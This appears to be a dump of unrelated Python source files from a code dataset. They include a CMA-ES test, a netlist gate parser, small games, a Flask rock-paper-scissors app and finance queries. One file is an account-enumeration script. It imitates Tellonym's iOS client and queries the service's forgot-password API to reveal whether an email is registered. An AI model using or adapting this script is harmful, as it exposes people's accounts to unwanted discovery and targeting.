text stringlengths 8 6.05M |
|---|
import operator
from bert_serving.client import BertClient
import configparser
import json
import numpy as np
def create_2_freq():
config = configparser.ConfigParser()
config.read("paths.cfg")
with open(config["paths"]["triple_string_cpnet_json"], "r", encoding="utf8") as f:
triple_str_json = json.load(f)
print("Read " + str(len(triple_str_json)) + " triple strings.")
concept_2_freq = {}
relation_2_freq = {}
for data in triple_str_json:
words = data["string"].strip().split(" ")
subj_start = data["subj_start"]
subj_end = data["subj_end"]
obj_start = data["obj_start"]
obj_end = data["obj_end"]
subj = "_".join(words[subj_start:subj_end])
obj = "_".join(words[obj_start:obj_end])
rel = data["rel"]
if subj not in concept_2_freq:
concept_2_freq[subj] = 0
concept_2_freq[subj] += 1
if obj not in concept_2_freq:
concept_2_freq[obj] = 0
concept_2_freq[obj] += 1
if rel not in relation_2_freq:
relation_2_freq[rel] = 0
relation_2_freq[rel] += 1
with open(config["paths"]["concept_2_freq"], "w", encoding="utf8") as f:
sorted_x = sorted(concept_2_freq.items(), key=operator.itemgetter(1), reverse=True)
for w, fre in sorted_x:
f.write("%s\t%d\n"%(w, fre))
with open(config["paths"]["relation_2_freq"], "w", encoding="utf8") as f:
sorted_x = sorted(relation_2_freq.items(), key=operator.itemgetter(1), reverse=True)
for w, fre in sorted_x:
f.write("%s\t%d\n"%(w, fre))
if __name__ == "__main__":
create_2_freq()
|
#!/usr/bin/python
#qplot -x -3d -s 'set xlabel "x";set ylabel "y";set view equal xy' outcmaes_obj.dat w l outcmaes_res.dat ps 3 data/res000{0,1,2,3,5,6}.dat -showerr
# TEST: seed CMA-ES with previously stored solutions/scores, then optimize.
# Modernized from Python 2 (`print` statements, `file()`, `raw_input()`) to
# Python 3; behavior otherwise unchanged.
import cma
import numpy as np


def fobj1(x, f_none=None):
    """Convex quadratic with minimum at (1.2, -2.0).

    `f_none` is the value to return for "holes" in the objective (kept for
    compatibility with the commented-out hole experiment); currently unused.
    """
    assert len(x) == 2
    return 3.0 * (x[0] - 1.2) ** 2 + 2.0 * (x[1] + 2.0) ** 2


def frange(xmin, xmax, num_div):
    """num_div+1 evenly spaced samples from xmin to xmax inclusive."""
    return [xmin + (xmax - xmin) * k / float(num_div) for k in range(num_div + 1)]


fobj = fobj1
using_init = True

# Stored warm-start data: start point, per-variable sigma, and popsize-1
# previously evaluated samples with their scores.
init_x0 = [1.6, 2.5]
init_sigma0 = [0.25, 0.5]
init_solutions0 = [
    np.array([1.15577068683, 2.78306227797]),
    np.array([1.97053342159, 1.51965484274]),
    np.array([1.56030150378, 2.90707053744]),
    np.array([1.5699010727, 2.90721893587]),
    np.array([1.99722431459, 2.95065252211])]
init_score0 = [
    45.761238,
    26.557106,
    48.548134,
    48.572076,
    50.924621]

options = {'CMA_diagonal': 1, 'verb_time': 0}
options['bounds'] = [[-3.0, -3.0], [3.0, 3.0]]
options['tolfun'] = 1.0e-4
options['scaling_of_variables'] = np.array([0.5, 1.0])

scale0 = 0.5
parameters0 = [1.6, 2.5]
if using_init:
    parameters0 = init_x0
    scale0 = 1.0
    options['scaling_of_variables'] = init_sigma0

es = cma.CMAEvolutionStrategy(parameters0, scale0, options)
solutions, scores = [], []
if using_init:
    assert len(init_solutions0) == len(init_score0)
    # Advance the internal sampler once before injecting the stored samples.
    es.ask(len(init_solutions0))
    solutions = init_solutions0
    scores = init_score0
print('es.result():', es.result())

count = 0
while not es.stop():
    # Top the population up to popsize with freshly sampled candidates.
    while len(solutions) < es.popsize:
        x = es.ask(1)[0]
        f = fobj(x)
        if f is not None:  # objective may abstain ("hole"); skip those
            solutions.append(x)
            scores.append(f)
    es.tell(solutions, scores)
    es.disp()
    print('es.result()@%i:' % count, es.result())
    # Dump this generation's candidates for plotting.
    with open('data/res%04i.dat' % count, 'w') as fp:
        for x in solutions:
            fp.write('%s %f\n' % (' '.join(map(str, x)), fobj(x, -10)))
    count += 1
    solutions, scores = [], []

res = es.result()
print('best solutions = ', res[0])
print('best solutions fitness = %f' % res[1])
print(res)

# Dump the objective surface on a 101x101 grid for the qplot command above.
with open('outcmaes_obj.dat', 'w') as fp:
    for x1 in frange(-4.0, 4.0, 100):
        for x2 in frange(-4.0, 4.0, 100):
            x = np.array([x1, x2])
            fp.write('%s %f\n' % (' '.join(map(str, x)), fobj(x, -10)))
        fp.write('\n')

# Dump the best point found.
with open('outcmaes_res.dat', 'w') as fp:
    x = res[0]
    fp.write('%s %f\n' % (' '.join(map(str, x)), fobj(x, -10)))

cma.plot()
input('press a key to exit > ')
#cma.savefig('outcmaesgraph')
|
import z3
from functools import *  # brings `reduce` into scope for Logic.applyClass2/applyGen
# When True, Logic precomputes an exhaustive per-output truth table at
# construction time so getPossible() returns exact probabilities (slower init).
MODE_ACC = False # enum input for higher acc
def portType(group, func):
    """Classify a cell pin group as 'output' or 'input'.

    Y and CO groups are always outputs; S is an output only on adder cells
    (ADDF/ADDH). Everything else is an input.
    """
    if group in ('Y', 'CO'):
        return 'output'
    if group == 'S' and func in ('ADDF', 'ADDH'):
        return 'output'
    return 'input'
class Logic:
    """
    Model of one standard-cell gate instance parsed from a netlist.

    Evaluation rules by class (see LogicClass):
      class 1: out = func(ins)                      (XOR/OR/NAND/AND/XNOR/NOR)
      class 2: out = [not] X2(X1(group1), X1(group2), ...)
               for AOI/AO/OAI/OA; the digit suffix ddd encodes
               len(group1) len(group2) ...; trailing 'I' inverts the output
      class 3: out = [not] selected input           (MX/MXT/MXIT 2:1 mux)
      class 4: out = [not] in                       (BUF/BUFH/INV)
      class 5/6 (ADDH/ADDF half/full adder):
               S  = xor(inputs)
               CO = in1 in2 + in2 in3 + in1 in3
    """
    # Cell-name prefixes, matched with startswith in this order — longer
    # prefixes must precede their own prefixes (MXIT before MXT before MX,
    # BUFH before BUF).
    LogicPrefix = [
        'XOR', 'OR', 'NAND', 'AND', 'XNOR', 'NOR',  # class 1
        'AOI', 'AO',
        'OAI', 'OA',                                # class 2
        'MXIT', 'MXT', 'MX',                        # class 3
        'BUFH', 'BUF', 'INV',                       # class 4
        'ADDF', 'ADDH'                              # class 5/6
    ]
    LogicClass = {
        'XOR': 1, 'OR': 1, 'NAND': 1, 'AND': 1, 'XNOR': 1, 'NOR': 1,
        'AOI': 2, 'AO': 2,
        'OAI': 2, 'OA': 2,       # class 2
        'MXIT': 3, 'MXT': 3, 'MX': 3,  # class 3
        'BUFH': 4, 'BUF': 4, 'INV': 4,  # class 4
        'ADDH': 5, 'ADDF': 6     # class 5/6
    }
    # Probability semantics: each input is an independent P(signal == 1).
    BasicP = {
        'XOR': lambda I1, I2: 1 - (I1) * (I2) - (1 - (I1)) * (1 - (I2)),
        'OR': lambda I1, I2: 1 - (1 - (I1)) * (1 - (I2)),
        'AND': lambda I1, I2: (I1) * (I2),
        'INV': lambda I1: 1 - (I1),
        'BUF': lambda I1: (I1),
        'MX': lambda I1, I2, SW: (SW) * (I2) + (1 - (SW)) * (I1)  # SW == 0 => I1
    }
    # Concrete boolean semantics.
    BasicA = {
        'XOR': lambda I1, I2: (I1) ^ (I2),
        'OR': lambda I1, I2: (I1) or (I2),
        'AND': lambda I1, I2: (I1) and (I2),
        'INV': lambda I1: not (I1),
        'BUF': lambda I1: (I1),
        'MX': lambda I1, I2, SW: (I2) if SW else (I1)
    }
    # Symbolic z3 semantics.
    BasicZ3 = {
        'XOR': lambda I1, I2: z3.Xor((I1), (I2)),
        'OR': lambda I1, I2: z3.Or((I1), (I2)),
        'AND': lambda I1, I2: z3.And((I1), (I2)),
        'INV': lambda I1: z3.Not((I1)),
        'BUF': lambda I1: (I1),
        'MX': lambda I1, I2, SW: z3.Or(z3.And((SW), (I2)), z3.And(z3.Not((SW)), (I1)))
    }

    def parseFunc(self, fn):
        """Split a cell name like 'AOI32' into func='AOI', para='32', lclass=2."""
        for prefix in Logic.LogicPrefix:
            if fn.startswith(prefix):
                self.func = prefix
                self.para = fn[len(prefix):]
                # Keep only the digits (drops drive-strength suffixes etc.).
                self.para = re.sub(r'\D', '', self.para)
                self.lclass = Logic.LogicClass[self.func]
                return
        assert False  # unknown func type !!

    def statement(self):
        """Re-emit this instance as a verilog-style instantiation line."""
        a1 = self.func + self.para + " "
        a1 += self.define['name'] + ' ('

        def processArg(arg):
            # Render each pin as .<group><id>[N](<net name>)
            sub = []
            for group in arg:
                for pin in arg[group]:
                    sub.append("." + pin['group'] + str(pin['id']) + ('N' if pin['inv'] else '') + "(" + pin['name'] + ')')
            return ', '.join(sub)

        a1 += processArg(self.define['argsIn']) + ', ' + processArg(self.define['argsOut']) + ' );'
        return a1

    def __init__(self, define):
        """
        define: {func: str, name: str, argsIn: Args, argsOut: Args}
        Args:   {A: [Arg], B: [Arg], C: [Arg], ...}
        Arg:    {group: str, id: int, name: str (net name), inv: bool,
                 type: 'input'/'output'}
        """
        self.name = define['name']
        self.define = define
        self.inputs = []
        for group in define['argsIn']:
            for pin in define['argsIn'][group]:
                self.inputs.append(pin['name'])
        self.outputs = []
        for group in define['argsOut']:
            for pin in define['argsOut'][group]:
                self.outputs.append(pin['name'])
        self.parseFunc(define['func'])
        # Per-output list of input assignments (bool lists ordered like
        # self.inputs, LSB first) under which that output evaluates to 1.
        self.acc_mode_cache = {k: [] for k in self.outputs}
        if (MODE_ACC):
            for i in range(0, 2 ** len(self.inputs)):
                inx = []
                k = i
                for j in range(0, len(self.inputs)):
                    inx.append((k % 2) == 1)
                    k //= 2
                inmap = {name: val for name, val in zip(self.inputs, inx)}
                rst = self.eval(lambda I: inmap[I])
                for out in rst:
                    if rst[out]:
                        self.acc_mode_cache[out].append(inx)

    def __str__(self):
        """Debug dump: pins, full truth table, and output probabilities."""
        outs = ""
        outs += " > Logic: " + self.name + "(" + self.func + ", " + self.para + ")" + "\n"
        outs += " > Inputs: \n"
        innames = []
        for gsi in self.define['argsIn']:
            for ii in self.define['argsIn'][gsi]:
                nn = "N" if ii['inv'] else ""
                outs += " >" + ii['group'] + str(ii['id']) + " " + (nn) + ": " + ii['name'] + "\n"
                innames.append(ii['name'])
        outs += " > Outputs: \n"
        statP = {}
        for gsi in self.define['argsOut']:
            for ii in self.define['argsOut'][gsi]:
                nn = "N" if ii['inv'] else ""
                outs += " >" + ii['group'] + str(ii['id']) + " " + (nn) + ": " + ii['name'] + "\n"
                statP[ii['name']] = 0
        outs += " Input = " + ", ".join(innames) + "\n"
        # Enumerate all assignments (bit j of i drives input j) and tally how
        # often each output is 1.
        for i in range(0, 2 ** len(innames)):
            k = i
            outs += " Input = "
            iis = []
            invals = {}
            for j in range(0, len(innames)):
                invals[innames[j]] = ((k % 2) == 1)
                iis.append(str(k % 2))
                k //= 2
            outs += ", ".join(iis)
            evals = self.eval(lambda I: invals[I])
            for ii in evals:
                if evals[ii]:
                    statP[ii] = statP[ii] + 1
            outs += " => " + str(evals) + "\n"
        # Compare closed-form probability at P=0.5 against the exact fraction.
        outP = self.getPossible(lambda I: 0.5)
        outPa = [statP[i] / (2 ** len(innames)) for i in statP]
        outs += " OutputP = " + str(outP) + ", OutputPACC = " + str(outPa)
        return outs

    def getRunFunc(self):
        """Map this cell (class 1/3/4) to a base op plus an output inversion flag."""
        assert self.lclass == 1 or self.lclass == 3 or self.lclass == 4
        runFunc = self.func
        postNot = False
        if runFunc == 'XNOR':
            runFunc = 'XOR'
            postNot = True
        if runFunc == 'NAND':
            runFunc = 'AND'
            postNot = True
        if runFunc == 'NOR':
            runFunc = 'OR'
            postNot = True
        if runFunc == 'MXT':
            runFunc = 'MX'
        if runFunc == 'BUFH':
            runFunc = 'BUF'
        if runFunc == 'MXIT':
            runFunc = 'MX'
            postNot = True
        return runFunc, postNot

    def getRunSteps(self):
        """Decode a class-2 name: ('AND'|'OR') stage 1, stage 2, inverted?."""
        assert self.lclass == 2
        decode = {'A': 'AND', 'O': 'OR'}
        s1 = decode[self.func[0]]
        s2 = decode[self.func[1]]
        postNot = len(self.func) == 3 and self.func[2] == 'I'
        return s1, s2, postNot

    def getInputWithINV(self, state, fNOT, arg):
        """Fetch one input value, applying the pin's inversion bubble if set."""
        val = state(arg['name'])
        if (arg['inv']):
            val = fNOT(val)
        return val

    def applyClass2(self, state, fX1, fX2, fNOT, inv):
        """Two-stage AOI/OAI evaluation: reduce each input group with fX1,
        then reduce the group results with fX2; single-pin groups feed fX2
        directly."""
        s2_inputs = []
        for gsi in self.define['argsIn']:
            gs = self.define['argsIn'][gsi]
            if len(gs) == 1:
                s2_inputs.append(self.getInputWithINV(state, fNOT, gs[0]))
            else:
                s1_grouped_inputs = [self.getInputWithINV(state, fNOT, ga) for ga in gs]
                s1_val = reduce(fX1, s1_grouped_inputs)
                s2_inputs.append(s1_val)
        val = reduce(fX2, s2_inputs)
        if inv:
            val = fNOT(val)
        return val

    def getAllInputs(self, state, fNOT):
        """All input values in group order, with per-pin inversions applied."""
        ins = []
        for group in self.define['argsIn']:
            for pin in self.define['argsIn'][group]:
                ins.append(self.getInputWithINV(state, fNOT, pin))
        return ins

    def applyGen(self, state, fGroup):
        """Evaluate the gate under the semantics in fGroup.

        state:  callable net-name -> value.
        fGroup: op table with 'XOR'/'OR'/'AND'/'INV'/'BUF'/'MX' entries
                (BasicP, BasicA or BasicZ3).
        Returns {output net name: value}.
        """
        if self.lclass == 1:
            runFunc, postNot = self.getRunFunc()
            in_vals = self.getAllInputs(state, fGroup['INV'])
            val = reduce(fGroup[runFunc], in_vals)
            if postNot:
                val = fGroup['INV'](val)
            return {self.outputs[0]: val}
        if self.lclass == 3:
            runFunc, postNot = self.getRunFunc()
            in_vals = ['A', 'B', 'S']
            in_vals = [self.getInputWithINV(state, fGroup['INV'], (self.define['argsIn'][i][0])) for i in in_vals]
            val = fGroup[runFunc](*in_vals)
            if postNot:
                val = fGroup['INV'](val)
            return {self.outputs[0]: val}
        if self.lclass == 2:
            x1, x2, postNot = self.getRunSteps()
            val = self.applyClass2(state, fGroup[x1], fGroup[x2], fGroup['INV'], postNot)
            return {self.outputs[0]: val}
        if self.lclass == 4:
            runFunc, _ = self.getRunFunc()
            val = fGroup[runFunc](*self.getAllInputs(state, fGroup['INV']))
            return {self.outputs[0]: val}
        if self.lclass == 5:  # ADDH: S = A xor B, CO = A and B
            in_vals = ['A', 'B']
            x1, x2 = [self.getInputWithINV(state, fGroup['INV'], (self.define['argsIn'][i][0])) for i in in_vals]
            s = fGroup['XOR'](x1, x2)
            co = fGroup['AND'](x1, x2)
            rst = {'S': s, 'CO': co}
            rst = {self.define['argsOut'][k][0]['name']: rst[k] for k in self.define['argsOut']}
            return rst
        if self.lclass == 6:  # ADDF: S = A xor B xor CI, CO = majority
            in_vals = ['A', 'B', 'CI']
            x1, x2, ci = [self.getInputWithINV(state, fGroup['INV'], (self.define['argsIn'][i][0])) for i in in_vals]
            x1xx2 = fGroup['XOR'](x1, x2)
            s = fGroup['XOR'](x1xx2, ci)
            co = fGroup['OR'](fGroup['AND'](x1xx2, ci), fGroup['AND'](x1, x2))
            rst = {'S': s, 'CO': co}
            rst = {self.define['argsOut'][k][0]['name']: rst[k] for k in self.define['argsOut']}
            return rst

    def getPossible(self, state):
        """Per-output P(out == 1) given state(net-name) -> P(input == 1),
        treating inputs as independent."""
        if (MODE_ACC):
            inP = [state(i) for i in self.inputs]
            ouP = {}
            for o in self.outputs:
                sop = 0
                for assignment in self.acc_mode_cache[o]:
                    op = 1
                    # BUG FIX: iterate the cached boolean assignment, not the
                    # input *names* — names are non-empty strings (always
                    # truthy), so every term collapsed to prod(inP).
                    for bit, p in zip(assignment, inP):
                        if bit:
                            op *= p
                        else:
                            op *= 1 - p
                    sop += op
                ouP[o] = sop
            return ouP
        if (self.lclass == 6):
            # Special workaround for the full adder: CO's inputs are not
            # independent through XOR, so sum the majority terms exactly.
            in_vals = ['A', 'B', 'CI']
            x1, x2, ci = [state(self.define['argsIn'][i][0]['name']) for i in in_vals]
            x1xx2 = Logic.BasicP['XOR'](x1, x2)
            s = Logic.BasicP['XOR'](x1xx2, ci)
            co = 0
            for v1 in range(0, 2):
                for v2 in range(0, 2):
                    for v3 in range(0, 2):
                        if v1 + v2 + v3 > 1:  # majority assignments only
                            p1 = x1 if v1 == 1 else 1 - x1
                            p2 = x2 if v2 == 1 else 1 - x2
                            p3 = ci if v3 == 1 else 1 - ci
                            co += p1 * p2 * p3
            rst = {'S': s, 'CO': co}
            rst = {self.define['argsOut'][k][0]['name']: rst[k] for k in self.define['argsOut']}
            return rst
        else:
            return self.applyGen(state, Logic.BasicP)

    def eval(self, state):
        """Concrete boolean evaluation; state(net-name) -> bool."""
        return self.applyGen(state, Logic.BasicA)

    def z3Interface(self, state):
        """Symbolic evaluation; state(net-name) -> z3 Bool expression."""
        return self.applyGen(state, Logic.BasicZ3)
import re
# One netlist port token: a group name (letters excluding n/N, so the trailing
# inversion marker is not absorbed), an optional numeric pin index, an optional
# 'N' inversion suffix, then the connected net name in parentheses.
rParseName = r"\.(?P<G>[a-mo-zA-MO-Z]+)(?P<Id>\d*)(?P<N>N){0,1}\((?P<Src>.+?)\)"
class VerilogParser:
    """
    "Verilog" Parser for logic cells.

    Token-driven state machine over one semicolon-terminated statement at a
    time. States:
      free        - expecting module/input/output/wire keyword or a cell type
      parseLogic0 - expecting the instance name
      parseLogic1 - expecting the opening '('
      parseLogic2 - expecting ')' or the start of a port token
      parseLogic3 - accumulating tokens until rParseName matches a full port
      input/output- collecting port names
    Results: self.ops (cell dicts), self.input/self.output/self.keyInput
    (port name sets), self.wire, self.wireIn (net -> consumer cells),
    self.wireOut (net -> driving cell).
    """
    def __init__(self):
        self.allFunc = set()  # every distinct cell func prefix seen
    def parseLine(self, l):
        """Consume one statement. Requires self.state (set by parseVerilog)."""
        if not l:
            return
        # Pad doubled parens so re.split below yields them as separate tokens.
        l = l.replace('((', '( (').replace('))', ') )')
        words = [x.strip() for x in re.split('\s|,|\*', l) if x.strip()]
        if (not words):
            return
        if (words[-1].endswith(';')):
            # Detach a trailing ';' into its own token.
            lst = words.pop()
            lst = lst[:-1]
            words.append(lst)
            words.append(';')
        curObject = None
        for w in words:
            if (self.state == 'free'):
                if (w == 'module'):
                    return # skip
                if (w == 'endmodule'):
                    self.state = 'over'
                    return # over
                if (w == 'input'):
                    self.state = 'input'
                    continue
                if (w == 'output'):
                    self.state = 'output'
                    continue
                if (w == 'wire'):
                    return # skip
                # Anything else is a cell type, e.g. 'NAND2_X1' -> func 'NAND2'.
                self.curObject = {'func': w.split('_')[0], 'name':'unknown', 'argsIn':{}, 'argsOut':{}}
                self.allFunc.add(self.curObject['func'])
                self.state = 'parseLogic0'
                continue
            if self.state == 'parseLogic0':
                self.curObject['name'] = w
                self.state = 'parseLogic1'
                continue
            if self.state == 'parseLogic1':
                if (w == '('):
                    self.state = 'parseLogic2'
                continue
            # NOTE: parseLogic3 is checked before parseLogic2 on purpose — a
            # completed match switches state to parseLogic2 and the current
            # token falls through to the parseLogic2 branch below.
            if self.state == 'parseLogic3':
                if self.matches:
                    # The previous tokens formed a complete port; record it.
                    g = self.matches.group('G')
                    sid = self.matches.group('Id') or 0
                    nn = not not self.matches.group('N')
                    src = self.matches.group('Src') or ''
                    obj = {'group': g, 'id': int(sid), 'name': src, 'inv': nn, 'type': portType(g, self.curObject['func'])}
                    typeName = 'argsIn' if obj['type'] == 'input' else 'argsOut'
                    if (not g in self.curObject[typeName]):
                        self.curObject[typeName][g] = []
                    self.curObject[typeName][g].append(obj)
                    # Track net connectivity for later graph traversal.
                    self.wire.add(src)
                    if not (src in self.wireIn):
                        self.wireIn[src] = set()
                    if (obj['type'] == 'input'):
                        self.wireIn[src].add(self.curObject['name'])
                    else:
                        self.wireOut[src] = self.curObject['name']
                    self.state = 'parseLogic2' # fallback to 2
                else:
                    # Port token split across words: keep accumulating.
                    self.matched += w
                    self.matches = re.match(rParseName, self.matched)
                    continue # add and match
            if self.state == 'parseLogic2':
                if (w == ')'):
                    # End of the port list: finalize this cell.
                    self.state = 'free'
                    self.ops.append(self.curObject)
                    self.curObject = None
                    return # skip
                else:
                    # Start accumulating a new port token.
                    self.matched = w
                    # (:G)(:Id)(:N)\(Src\)
                    self.matches = re.match(rParseName, self.matched)
                    self.state = 'parseLogic3'
                    continue
            if self.state == 'input':
                # key inputs (logic-locking keys) are tracked separately
                if (w.startswith('keyinput')):
                    self.keyInput.add(w)
                else:
                    self.input.add(w)
                continue
            if self.state == 'output':
                self.output.add(w)
                continue
            self.state = 'free'
    def parseVerilog(self, lines):
        """Parse a whole netlist (list of raw lines) and build Logic objects."""
        self.ops = []
        self.input = set()
        self.output = set()
        self.keyInput = set()
        self.wire = set()
        self.wireOut = {}
        self.wireIn = {}
        # Strip '//' comments and blanks, then re-split on ';' so each
        # statement is handled as one unit regardless of line breaks.
        lines = [l.strip() for l in lines]
        lines = [l.split('//', 1)[0].strip() for l in lines]
        lines = [l for l in lines if l]
        lines = "".join(lines).split(';')
        for l in lines:
            self.state = 'free'
            self.parseLine(l)
        self.ops = [Logic(i) for i in self.ops]
        self.opMap = {i.name: i for i in self.ops}
        # print(self.opMap['U3454'])
# print(self.opMap['U3454'])
if __name__ == "__main__":
    ### test only !!!
    import os
    import glob
    allFuncs = set()
    # Smoke-test Logic directly with a hand-built AOI32 cell definition.
    testl1 = Logic({'name': 'U6708', 'argsOut': {'Y': [{'name': 'U3453', 'inv': False, 'group': 'Y', 'type': 'output', 'id': 0}]}, 'argsIn': {'A': [{'name': 'STATE2_REG_0__SCAN_IN', 'inv': False, 'group': 'A', 'type': 'input', 'id': 0}, {'name': 'n6217', 'inv': False, 'group': 'A', 'type': 'input', 'id': 1}, {'name': 'n5577', 'inv': False, 'group': 'A', 'type': 'input', 'id': 2}], 'B': [{'name': 'n7072', 'inv': False, 'group': 'B', 'type': 'input', 'id': 0}, {'name': 'n6217', 'inv': False, 'group': 'B', 'type': 'input', 'id': 1}]}, 'func': 'AOI32'})
    print(str(testl1))
    # Parse every netlist under ./verilog and report its statistics.
    for filename in glob.glob(os.path.join(os.getcwd(), 'verilog', '*.v')):
        print('processing ' + filename )
        f = open(filename)
        parser = VerilogParser()
        parser.parseVerilog(f.readlines())
        print(' > input size: ' + str(len(parser.input)))
        print(' > output size: ' + str(len(parser.output)))
        print(' > key size: ' + str(len(parser.keyInput)))
        print(' > ops size: ' + str(len(parser.ops)))
        print(' > wire size: ' + str(len(parser.wire)))
        allFuncs = allFuncs | parser.allFunc
        for x in parser.ops:
            if x.func + x.para == 'INV':
                print(str(x))
        import sys
        # NOTE(review): exits after the first file, so f.close() and the
        # allFuncs summary below never run — presumably leftover debugging.
        sys.exit(0)
        # test func
        f.close()
    for f in allFuncs:
        print(f)
    #{'NOR3', 'NOR2', 'ADDH', 'ADDF', 'NAND4', 'INV'}
|
#!/usr/bin/python
# -*- coding:utf-8 -*-
# Author: Eason
# Demo of variadic arguments. Modernized from Python 2 print statements, and
# the function renamed from `str` (which shadowed the builtin) — all call
# sites are in this script.
def print_args(var1, *vartuple):
    """Print the required first argument, then each extra positional argument
    on its own line."""
    print(var1)
    for var in vartuple:
        print(var)

print("=" * 20)
print("输出定义的变量:")
print("=" * 20)
print_args(10)
print("=" * 20)
print("输出所有未定义的变量:")
print("=" * 20)
print_args(20, 30, 40)
print("=" * 20)
# Import yfinance
import yfinance as yf
import pandas as pd
# Daily OHLCV history for Ambev (B3 ticker ABEV3.SA) over August 2020.
data = yf.download("ABEV3.SA", start="2020-08-01", end="2020-08-30")
print(type(data))
print(data)
print(data['High'])    # single column as a Series
print(data[['Low']])   # single column kept as a DataFrame
print(data.iloc[1])    # second row by position
print(data.iloc[1][0])  # NOTE(review): chained positional indexing; data.iloc[1, 0] is the supported form
# Latest close for a few US tickers.
tickers = {"F", "WFC", "GM"}
for ticker in tickers:
    ticker_yahoo = yf.Ticker(ticker)
    data = ticker_yahoo.history()
    last_quote = (data.tail(1)['Close'].iloc[0])  # most recent closing price
    print(ticker,last_quote)
|
class Node:
    """Singly linked list node."""
    def __init__(self, data, next_node=None):
        self.data = data       # payload stored at this node
        self.next = next_node  # following node, or None at the tail
def find_circle_head(head):
seen_nodes = set()
while head is not None:
if head in seen_nodes:
return head
seen_nodes.add(head)
head = head.next
if __name__ == '__main__':
    # Build A -> B -> C -> D -> E, then point E back at C to form a cycle.
    node_a = Node('A', Node('B', Node('C', Node('D', Node('E')))))
    node_c = node_a.next.next
    node_e = node_c.next.next
    node_e.next = node_c
    print(find_circle_head(node_a).data)  # prints 'C', the cycle entry
|
import requests
# Importing requests

# Probes Tellonym's forgot-password endpoint to check whether an email
# address has an account (email enumeration via the password-reset flow).
url = "https://api.tellonym.me/accounts/forgotpassword"
# Check Email Linked API URL
headers = {
    "Host": "api.tellonym.me",
    "Content-Type": "application/json",
    "Accept": "application/json",
    "Connection": "keep-alive",
    "tellonym-client": "ios:2.65.0:488:14:iPhone13,3",
    "User-Agent": "Tellonym/488 CFNetwork/1206 Darwin/20.1.0",
    "Accept-Language": "en",
}
# Check Email Linked API Headers (mimics the official iOS client)
email = input("Email: ")
# Email Input
data = {
    "email": email,
    "limit": 16
}
# Check Email Linked API Data
req = requests.post(url, json=data, headers=headers)
# Check Email Linked API Request
# HTTP 200 => the service accepted the reset request, i.e. the email exists.
if req.status_code == 200:
    print("Linked Email !")
# Linked Email
elif "PARAMETER_MISSING" in req.text:
    print("Missing Something, Try Again")
# Missing Data
elif "The entry you were looking for could not be found." in req.text:
    print("Not Linked Email !")
# Not Linked
else:
    print("Error !")
    print(req)
    print(req.text)
# Error or Something Wrong
import random
import sys

# Game state for the dice walk over an n x n board (see loop below):
# row/col track the raw position, col_s the mirrored column on even rows,
# pos the running square count, flag marks visited squares.
n = 6
row = 1
col = 0
pos = 0
col_s = 0
f = 0
d = 0
roll_again = "yes"
flag = [[0 for j in range(n)] for i in range(n)]


def check(flag):
    """Return 1 (after announcing it) when some row or column of `flag` is
    entirely visited (all cells == 1); otherwise return 0."""
    for i in range(n):
        if all(flag[i][j] == 1 for j in range(n)):
            print("The row %d was completely visited\n" % i)
            return 1
    for i in range(n):
        if all(flag[j][i] == 1 for j in range(n)):
            print("The column %d was completely visited\n" % i)
            return 1
    return 0
print ("Your initial position is 0,0")
while (roll_again=="yes"):
    print ("Rolling Dice .....")
    # Pseudo die roll in 1..6 derived from a float in [0, 100).
    rnd=(int)(((random.random()*100)%6)+1)
    print ("Dice value is %d" %rnd)
    if((pos+rnd)>(n*n)):
        # Overshot the last square: wrap to the start, carrying the overshoot.
        row=1
        col=0
        rnd=((pos+rnd)-(n*n))
        pos=0
    pos=pos+rnd
    col=col+rnd
    if(col>n):
        # NOTE(review): when col lands exactly on n it is kept as-is, and
        # col % n yields 0 when col == 2n — that would index flag with -1 or n
        # below; confirm whether those cases can occur in practice.
        col=col%n
        row=row+1
    # Boustrophedon board: even rows run right-to-left, so mirror the column.
    if(row%2==0):
        col_s=n+1-col
    else:
        col_s=col
    print ("Your current position is %d,%d" %(row-1,col_s-1))
    flag[row-1][col_s-1]=1
    f=check(flag)
    if(f==1):
        var=input("game ends")
        quit()
    d=0
    roll_again = input("Enter yes if you want to roll again :")
print ("Your final position is %d,%d" %(row-1,col_s-1))
# Rock-paper-scissors web game. Session keys: 'win'/'lose'/'tie' hold running
# score totals, 'clicked' the player's last move, 'cpu' the computer's move.
from flask import Flask, session, request, redirect, render_template
import random
app=Flask(__name__)
app.secret_key='macbook'  # NOTE(review): hard-coded secret key — demo only
@app.route('/')
def index():
    """Serve the move-selection page."""
    return render_template('index.html')
# NOTE(review): the three result pages read session['win'/'lose'/'tie']
# directly, so visiting them before /player2 has run raises KeyError.
@app.route('/win')
def win():
    """Show the win page with the current score counters."""
    return render_template('win.html', win=session['win'], lose=session['lose'], tie=session['tie'])
@app.route('/lose')
def lose():
    """Show the lose page with the current score counters."""
    return render_template('lose.html', win=session['win'], lose=session['lose'], tie=session['tie'])
@app.route('/tie')
def tie():
    """Show the tie page with the current score counters."""
    return render_template('tie.html', win=session['win'], lose=session['lose'], tie=session['tie'])
@app.route('/player2', methods=['POST'])
def player2():
    """Resolve one rock-paper-scissors round.

    Reads the player's move from the submitted form, draws a CPU move,
    updates the session counters, and redirects to /win, /lose or /tie.
    """
    # Initialize the score counters on first play.
    for key in ('win', 'lose', 'tie'):
        if key not in session:
            session[key] = 0
    # The form contains exactly one of the three move buttons.
    if 'rock' in request.form:
        session['clicked'] = 'rock'
    elif 'paper' in request.form:
        session['clicked'] = 'paper'
    else:
        session['clicked'] = 'scissors'
    # BUG FIX: randrange's stop bound is exclusive, so randrange(1, 3) only
    # ever produced 1 or 2 and the CPU could never play scissors.
    cpu = random.randrange(1, 4)
    if cpu == 1:
        session['cpu'] = 'rock'
    elif cpu == 2:
        session['cpu'] = 'paper'
    else:
        session['cpu'] = 'scissors'
    # Standard RPS outcome table: each move beats exactly one other.
    beats = {'rock': 'scissors', 'paper': 'rock', 'scissors': 'paper'}
    if session['cpu'] == session['clicked']:
        session['tie'] += 1
        return redirect('/tie')
    if beats[session['clicked']] == session['cpu']:
        session['win'] += 1
        return redirect('/win')
    session['lose'] += 1
    return redirect('/lose')
@app.route('/reset')
def reset():
    """Zero all score counters and return to the start page."""
    session['win'] = 0
    session['lose'] = 0
    session['tie'] = 0
    return redirect('/')
# Dev server entry point (debug mode enabled).
app.run(debug=True)
|
from django.shortcuts import render, get_object_or_404, redirect, reverse
import os
from django.utils import timezone
from .models import Feature, Comment
from .forms import AddFeatureForm, AddFeatureCommentForm
from django.conf import settings
import stripe
import datetime
# Strip stray quote characters that may have been pasted into the settings value.
stripe.api_key = settings.STRIPE_SECRET_KEY.replace("'", "")
# Create your views here.
def features(request):
    """List all features, most upvoted first, with all comments, newest first."""
    features = Feature.objects.order_by('-upvotes')
